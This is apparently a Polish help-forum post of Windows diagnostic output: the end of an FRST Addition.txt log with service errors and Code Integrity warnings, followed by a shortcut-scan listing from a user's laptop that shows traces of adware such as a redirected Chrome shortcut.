Error: (04/22/2017 12:16:46 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Usługa Intel(R) Dynamic Application Loader Host Interface Service niespodziewanie zakończyła pracę. Wystąpiło to razy: 4.

Error: (04/22/2017 12:16:46 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Usługa Intel Security True Key niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. W przeciągu 60000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie.

Error: (04/22/2017 12:16:46 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Usługa Windows Search niespodziewanie zakończyła pracę. Wystąpiło to razy: 2. W przeciągu 30000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie.

Error: (04/22/2017 12:16:46 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Usługa NVIDIA Display Container LS niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. W przeciągu 5000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie.

Error: (04/22/2017 12:09:22 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Usługa User Experience Improvement Program niespodziewanie zakończyła pracę. Wystąpiło to razy: 2.


CodeIntegrity:
===================================
  Date: 2017-04-20 12:44:02.581
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-04-19 20:40:46.218
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Windows\System32\DriverStore\FileRepository\nvacwu.inf_amd64_bdd6ea477d4e2fba\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2017-04-19 18:41:28.827
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-04-19 18:18:25.330
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-19 17:32:36.654
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-18 15:02:54.329
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-18 11:40:53.160
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-18 11:00:34.184
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-17 18:38:41.937
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-14 15:06:23.049
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Windows\System32\DriverStore\FileRepository\nvacwu.inf_amd64_bdd6ea477d4e2fba\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Statystyki pamięci ===========================

Procesor: Intel(R) Core(TM) i3-5005U CPU @ 2.00GHz
Procent pamięci w użyciu: 62%
Całkowita pamięć fizyczna: 4010.45 MB
Dostępna pamięć fizyczna: 1516.12 MB
Całkowita pamięć wirtualna: 4714.45 MB
Dostępna pamięć wirtualna: 1356.79 MB

==================== Dyski ================================

Drive c: (Acer) (Fixed) (Total:930.4 GB) (Free:788.83 GB) NTFS

==================== MBR & Tablica partycji ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 06CA8F95)

Partition: GPT.

==================== Koniec  Addition.txt ============================


Kod: Zaznacz wszystko
Rezultat skanowania skrótów użytkowników (x64) Wersja: 22-04-2017
Uruchomiony przez Emil (22-04-2017 13:17:36)
Uruchomiony z C:\Users\Emil\Downloads
Tryb startu: Normal

==================== Skróty =============================

(Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.)





Shortcut: C:\ProgramData\{E4FEB43E-F69B-4D80-8F7F-D58114A44D4B}\DashlaneUpgradeInstaller.lnk ->
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\01 - File Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\03 - Documents.lnk -> C:\Users\Emil\Documents ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\04 - Downloads.lnk -> C:\Users\Emil\Downloads ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\05 - Music.lnk -> C:\Users\Emil\Music ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\06 - Pictures.lnk -> C:\Users\Emil\Pictures ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\07 - Videos.lnk -> C:\Users\Emil\Videos ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\08 - Homegroup.lnk -> Microsoft.Windows.Homegroup
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\09 - Network.lnk -> Microsoft.Windows.Network
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\10 - UserProfile.lnk -> C:\Users\Emil ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access 2016.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\MSACCESS.EXE (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader 9.lnk -> C:\Windows\Installer\{AC76BA86-7AD7-1045-7B44-A95000000001}\SC_Reader.ico ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AmazonAssistant.lnk -> C:\Program Files (x86)\Amazon\Amazon Assistant\amazonAssistantTaskbar.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel 2016.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Farming Simulator 17.lnk -> C:\Program Files\Farming Simulator 17\x64\FarmingSimulator2017Game.exe (GIANTS Software GmbH)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Boxbob\Application\chrome.exe (Google Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Immersive Control Panel.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MiracastView.lnk -> C:\Windows\MiracastView\MiracastView.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Brak pliku)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote 2016.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook 2016.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerPoint 2016.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PrintDialog.lnk -> C:\Windows\PrintDialog\PrintDialog.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Publisher 2016.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\MSPUB.EXE (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\The Sims 4.lnk -> C:\Program Files (x86)\The Sims 4\Game\Bin\TS4.exe (Electronic Arts Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word 2016.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR\Co nowego w ostatniej wersji.lnk -> C:\Program Files\WinRAR\CoNowego.txt ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR\Podręcznik RARa dla konsoli.lnk -> C:\Program Files\WinRAR\Rar.txt ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR\Pomoc WinRARa.lnk -> C:\Program Files\WinRAR\WinRAR.chm ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR\WinRAR.lnk -> C:\Program Files\WinRAR\WinRAR.exe (Alexander Roshal)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Windows Defender.lnk -> C:\Program Files\Windows Defender\MSASCui.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sylenth1\Manual.lnk -> C:\sylenthhh\Sylenth1\Manual-English.pdf ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sylenth1\Uninstall Sylenth1.lnk -> C:\sylenthhh\Sylenth1\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sylenth1\Visit LennarDigital.lnk -> C:\sylenthhh\Sylenth1\LennarDigital.url ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.523\SSScheduler.exe (McAfee, Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScreenShot\ScreenShot.lnk -> C:\Program Files (x86)\ScreenShot\ScreenShot.exe (Filseclab Corporation Limited)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScreenShot\SSInst.lnk -> C:\Program Files (x86)\ScreenShot\SSInst.exe (Filseclab Corporation Limited)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PlayWay SA\Farm Expert 2017\Deinstalacja programu Farm Expert 2017.lnk -> C:\Program Files (x86)\Farm Expert 2017\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PlayWay SA\Farm Expert 2017\Farm Expert 2017 Editor.lnk -> C:\Program Files (x86)\Farm Expert 2017\ar_edytor.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PlayWay SA\Farm Expert 2017\Farm Expert 2017.lnk -> C:\Program Files (x86)\Farm Expert 2017\FE2017.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PlayWay SA\Farm Expert 2017\Uninstall Farm Expert 2017.lnk -> C:\Windows\System32 ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Narzędzia pakietu Microsoft Office 2016\Preferencje językowe pakietu Office 2016.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\My Connection\Deinstalacja programu  My Connection.lnk -> C:\Program Files (x86)\My Connection\uninst\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\My Connection\My Connection.lnk -> C:\Program Files (x86)\My Connection\Maincontroller.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes\Malwarebytes.lnk -> C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe (Malwarebytes)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes\Uninstall Malwarebytes.lnk -> C:\Program Files\Malwarebytes\Anti-Malware\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Image-Line\FL Studio 12.lnk -> C:\FL Studio 12.4.2\FL.exe (Image-Line)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Image-Line\More....lnk -> C:\Program Files (x86)\Image-Line\Shared\Start ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Emergency 2017\Emergency 2017.lnk -> C:\Program Files (x86)\Emergency 2017\bin\em5_launcher.exe (Sixteen Tons Entertainment)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Emergency 2017\Uninstall Emergency 2017.lnk -> C:\Program Files (x86)\Emergency 2017\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DLL-Files.com Client\Client.lnk -> C:\Program Files (x86)\DLL-Files.com Client\DLLFilesClient.exe (DLL-files.com)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DLL-Files.com Client\Deinstalacja programu Client.lnk -> C:\Program Files (x86)\DLL-Files.com Client\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CyberLink PowerDVD 12\CyberLink PowerDVD 12.lnk -> C:\Program Files (x86)\CyberLink\PowerDVD12\PDVDLP.exe (CyberLink Corp.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.6\Cheat Engine 6.6 (32-bit).lnk -> C:\Program Files (x86)\Cheat Engine 6.6\cheatengine-i386.exe (Cheat Engine)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.6\Cheat Engine 6.6 (64-bit).lnk -> C:\Program Files (x86)\Cheat Engine 6.6\cheatengine-x86_64.exe (Cheat Engine)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.6\Cheat Engine 6.6.lnk -> C:\Program Files (x86)\Cheat Engine 6.6\Cheat Engine.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.6\Cheat Engine help.lnk -> C:\Program Files (x86)\Cheat Engine 6.6\CheatEngine.chm ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.6\Cheat Engine tutorial (64-bit).lnk -> C:\Program Files (x86)\Cheat Engine 6.6\Tutorial-x86_64.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.6\Cheat Engine tutorial.lnk -> C:\Program Files (x86)\Cheat Engine 6.6\Tutorial-i386.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.6\Reset settings.lnk -> C:\Program Files (x86)\Cheat Engine 6.6\ceregreset.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.6\Uninstall Cheat Engine.lnk -> C:\Program Files (x86)\Cheat Engine 6.6\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.6\Kernel stuff\Unload kernel module.lnk -> C:\Program Files (x86)\Cheat Engine 6.6\Kernelmoduleunloader.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BitComet (64-bit)\BitComet.lnk -> C:\Program Files\BitComet\BitComet.exe (www.BitComet.com)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BitComet (64-bit)\HomePage.lnk -> C:\Program Files\BitComet\BitComet.url ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BitComet (64-bit)\Uninstall.lnk -> C:\Program Files\BitComet\uninst.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net\Battle.net.lnk -> C:\Program Files (x86)\Battle.net\Battle.net Launcher.exe (Blizzard Entertainment)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Component Services.lnk -> C:\Windows\System32\comexp.msc ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\dfrgui.lnk -> C:\Windows\System32\dfrgui.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Disk Cleanup.lnk -> C:\Windows\System32\cleanmgr.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\iSCSI Initiator.lnk -> C:\Windows\System32\iscsicpl.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Memory Diagnostics Tool.lnk -> C:\Windows\System32\MdSched.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\ODBC Data Sources (32-bit).lnk -> C:\Windows\SysWOW64\odbcad32.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\ODBC Data Sources (64-bit).lnk -> C:\Windows\System32\odbcad32.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk -> C:\Windows\System32\services.msc ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk -> C:\Windows\System32\msconfig.exe (Microsoft® Windows® Operating System)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Information.lnk -> C:\Windows\System32\msinfo32.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows Firewall with Advanced Security.lnk -> C:\Windows\System32\WF.msc ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer\abPhoto.lnk -> C:\Program Files (x86)\Acer\abPhoto\abPhoto.exe (Acer Incorporated)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer\Acer Care Center.lnk -> C:\Program Files (x86)\Acer\Care Center\CareCenter.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer\Acer Power Button.lnk -> C:\Program Files\Acer\Acer Quick Access\ePowerButton_NB.exe (Acer Incorporated)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer\Acer Quick Access.lnk -> C:\Program Files\Acer\Acer Quick Access\QuickAccess.exe (Acer Incorporated)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer\Acer User Experience Improvement Program.lnk -> C:\Program Files\Acer\User Experience Improvement Program\Framework\Setting.exe (acer)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Math Input Panel.lnk -> C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk -> C:\Windows\System32\mspaint.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Quick Assist.lnk -> C:\Windows\System32\quickassist.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Remote Desktop Connection.lnk -> C:\Windows\System32\mstsc.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk -> C:\Windows\System32\SnippingTool.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Steps Recorder.lnk -> C:\Windows\System32\psr.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Fax and Scan.lnk -> C:\Windows\System32\WFS.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Wordpad.lnk -> C:\Program Files\Windows NT\Accessories\wordpad.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\XPS Viewer.lnk -> C:\Windows\System32\xpsrchvw.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Character Map.lnk -> C:\Windows\System32\charmap.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnk -> C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE (x86).lnk -> C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell_ISE.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell_ISE.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\computer.lnk -> C:\Windows\explorer.exe,-30
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Control Panel.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\File Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Run.lnk -> C:\Windows\System32\shell32.dll (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk -> C:\Windows\System32\notepad.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Magnify.lnk -> C:\Windows\System32\Magnify.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Narrator.lnk -> C:\Windows\System32\Narrator.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\On-Screen Keyboard.lnk -> C:\Windows\System32\osk.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\AmazonAssistant.lnk -> C:\Program Files (x86)\Amazon\Amazon Assistant\amazonAssistantTaskbar.exe ()
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\01 - Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\01a - Windows PowerShell.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\02 - Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\02a - Windows PowerShell.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\03 - Computer Management.lnk -> C:\Windows\System32\compmgmt.msc ()
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\04 - Disk Management.lnk -> C:\Windows\System32\diskmgmt.msc ()
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\07 - Event Viewer.lnk -> C:\Windows\System32\eventvwr.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\09 - Mobility Center.lnk -> C:\Windows\System32\mblctr.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\4 - Control Panel.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\Music\Obrazy — skrót.lnk -> C:\Users\Emil\Pictures ()
Shortcut: C:\Users\Emil\Links\Desktop.lnk -> C:\Users\Emil\Desktop ()
Shortcut: C:\Users\Emil\Links\Downloads.lnk -> C:\Users\Emil\Downloads ()
Shortcut: C:\Users\Emil\Desktop\FL Studio 12 (64bit).lnk -> C:\FL Studio 12.4.2\FL64.exe (Image-Line)
Shortcut: C:\Users\Emil\Desktop\FL Studio 12.lnk -> C:\FL Studio 12.4.2\FL.exe (Image-Line)
Shortcut: C:\Users\Emil\Desktop\Komp.lnk -> System Folder
Shortcut: C:\Users\Emil\Desktop\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
Shortcut: C:\Users\Emil\Desktop\OpenFM.lnk -> C:\Users\Emil\AppData\Local\OpenFM\Application\openfm.exe (Mozilla Foundation)
Shortcut: C:\Users\Emil\Desktop\Opera.lnk -> C:\Users\Emil\AppData\Local\Programs\Opera\launcher.exe (Opera Software)
Shortcut: C:\Users\Emil\Desktop\WarThunder.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
Shortcut: C:\Users\Emil\Desktop\Proje\GG.lnk -> C:\Users\Emil\AppData\Local\GG\Application\gghub.exe (GG Network S.A.)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\GG.lnk -> C:\Users\Emil\AppData\Local\GG\Application\gghub.exe (GG Network S.A.)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Menedżer HD Audio.lnk -> C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (Realtek Semiconductor)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk -> C:\Users\Emil\AppData\Local\Microsoft\OneDrive\OneDrive.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OpenFM.lnk -> C:\Users\Emil\AppData\Local\OpenFM\Application\openfm.exe (Mozilla Foundation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Opera.lnk -> C:\Users\Emil\AppData\Local\Programs\Opera\launcher.exe (Opera Software)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ustawienia aktualizacji i prywatności.lnk -> C:\Windows\System32\UNP\UNPUXHost.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Wolfenstein - Enemy Territory\Enemy Territory.lnk -> C:\Program Files (x86)\Wolfenstein - Enemy Territory\et.exe ()
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Wolfenstein - Enemy Territory\Help.lnk -> C:\Program Files (x86)\Wolfenstein - Enemy Territory\Docs\Help\index.htm ()
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Wolfenstein - Enemy Territory\Uninstall.lnk -> C:\Program Files (x86)\Wolfenstein - Enemy Territory\uninstall.exe ()
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Wolfenstein - Enemy Territory\PunkBuster\PB Install.lnk -> C:\Program Files (x86)\Wolfenstein - Enemy Territory\pb\pbsvc.exe ()
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR\Co nowego w ostatniej wersji.lnk -> C:\Program Files\WinRAR\CoNowego.txt ()
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR\Podręcznik RARa dla konsoli.lnk -> C:\Program Files\WinRAR\Rar.txt ()
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR\Pomoc WinRARa.lnk -> C:\Program Files\WinRAR\WinRAR.chm ()
